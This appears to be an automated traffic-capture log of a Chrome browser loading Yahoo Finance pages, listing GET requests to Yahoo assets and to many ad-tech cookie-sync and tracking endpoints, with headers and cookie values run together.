Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Spinner.DBQ4b_Oq.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /pixel?google_nid=triplelift&google_cm&google_sc&gdpr=0&gdpr_consent= HTTP/1.1Host: cm.g.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiVocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eb2.3lift.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: IDE=AHWqTUkUkNwMMgJ6QEXcNmBLe89FRWkxDD1qfpDAQyrRUH_QfzDefzbvv9fnUjUM9uM
Source: global trafficHTTP traffic detected: GET /track/cmb/generic?ttd_pid=svx9t50&ttd_tpi=1&gdpr=0&gdpr_consent=&gpp=DBAA&gpp_sid= HTTP/1.1Host: match.adsrvr.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eb2.3lift.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: TDID=07c89b85-4c1c-424d-8df0-0123ed6cebb6; TDCPM=CAEYBSgCMgsImMDYpOHfsD0QBTgB
Source: global trafficHTTP traffic detected: GET /cv/apiv2/weather-svg/MOSTLY_SUNNY.svg HTTP/1.1Host: s.yimg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aaq/wf/wf-autocomplete-1.31.8-modern-a4f31e10ae.chunk.js HTTP/1.1Host: s.yimg.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /aoldotcom-releases/games/masque/SolitaireClassic_600x400.png HTTP/1.1Host: s.aolcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sync/openx/1d1d5d09-d0b5-a85e-6fc0-6f55ed82d00e?gdpr=0 HTTP/1.1Host: pr-bh.ybp.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://u.openx.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Autocomplete.q9sgwYZU.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/AddToFollowing.Cg_49_NO.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /js/ld/publishertag.prebid.144.js HTTP/1.1Host: static.criteo.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.yahoo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /w/1.0/sd?id=537148856&val=ZvreFAAGJF7U4wAF&_test=ZvreFAAGJF7U4wAF HTTP/1.1Host: us-u.openx.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://u.openx.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: receive-cookie-deprecation=1; i=5a760414-e99e-05e0-04c1-b14876f22eba|1727716879; pd=v2|1727716881|vMgavPkWgyiK
Source: global trafficHTTP traffic detected: GET /scripts/ifs.js HTTP/1.1Host: cdn.taboola.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: abLdr=26; receive-cookie-deprecation=1; t_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; t_pt_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
Source: global trafficHTTP traffic detected: GET /xuid?mid=3658&xuid=07c89b85-4c1c-424d-8df0-0123ed6cebb6&dongle=0cfd&gdpr=0&gdpr_consent= HTTP/1.1Host: eb2.3lift.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eb2.3lift.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: tluidp=3811239664715375770435; tluid=3811239664715375770435
Source: global trafficHTTP traffic detected: GET /AdServer/PugMaster?sec=1&async=1&kdntuid=1&rnd=56135341&p=133799&s=0&a=0&ptask=ALL&np=0&fp=0&rp=0&mpc=0&spug=1&coppa=0&gdpr=0&gdpr_consent=&us_privacy=1YNN HTTP/1.1Host: image6.pubmatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ads.pubmatic.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sg/taboola-ifs/1/um/?uils=27eb735b-f48b-4088-80a5-78ec8c9435df-tuctdf46380!-%23%40718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383 HTTP/1.1Host: trc.taboola.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://cdn.taboola.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: t_pid=27eb735b-f48b-4088-80a5-78ec8c9435df-tuctdf46380; receive-cookie-deprecation=1; t_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; t_pt_gid=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383
Source: global trafficHTTP traffic detected: GET /v000/sync?extinit=0&userid=7992184014990425658&pn_id=an HTTP/1.1Host: ads.yieldmo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ads.yieldmo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: yieldmo_id=VRLAoLL__uL1ewyIa5Iq%7C1727654400000%7C0; re_sync=rc%3D1200643%7Cunl%3D1200643%7Ct%3D1200643%7Cpub%3D1200643%7Can%3D1200643
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/Dialog.Ch6G-Ji-.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/MenuSurface.B2lZ9U34.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /r/cs?pid=45&id=RX-3fef85e6-bbf0-409a-a376-6c1ad497756a-003&rndcb=5981760910 HTTP/1.1Host: ad.turn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://ads.yieldmo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /xuid?mid=5989&xuid=CAESEOe2R8T-8keCMBRyELE2mow&dongle=c627&gdpr=0&gdpr_consent=&google_cver=1 HTTP/1.1Host: eb2.3lift.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://eb2.3lift.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: tluidp=3811239664715375770435; tluid=3811239664715375770435
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/sortable.CfnaMg_z.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /assets/_app/immutable/assets/PositionDeleteMessage.B-8pT6wm.css HTTP/1.1Host: finance.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://finance.yahoo.com/sectors/basic-materials/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1; axids=gam=y-PMOp3thE2uLhyy8QFBkAKGqNgLvzneG4~A&dv360=eS1LZzdROG1GRTJ1RVZ3MWZ2WWt1bTRBdVAxOElBSy5Dbn5B&ydsp=y-WXkjhRBE2uJjlZ_QwZAT4oBAasxO1UgW~A&tbla=y-GxlMYYJE2uKUC.fndnfIPNmh3DR_ejLH~A; tbla_id=718c48d0-56f4-46af-b98a-81a327f4b9c5-tuctdf46383; __gads=ID=9e1f1bcfb981154e:T=1727716876:RT=1727716876:S=ALNI_MZbu06nRe70doE7Am1306bjZBopGw; __gpi=UID=00000efef81eaeb2:T=1727716876:RT=1727716876:S=ALNI_Mb6c_qZj_qcAZ-YRLXBZ1XgJ5ozPw; __eoi=ID=1ec18cf0052b6e87:T=1727716876:RT=1727716876:S=AA-AfjYtYuQWIvoKp4IIb--5_VOy
Source: global trafficHTTP traffic detected: GET /dcm?pid=6e1b1225-4dd8-4d7d-b277-465574a27014&id=d10c4730-5cb3-81ed-9e19-fb377ae6d6a7 HTTP/1.1Host: s.amazon-adsystem.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://u.openx.net/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
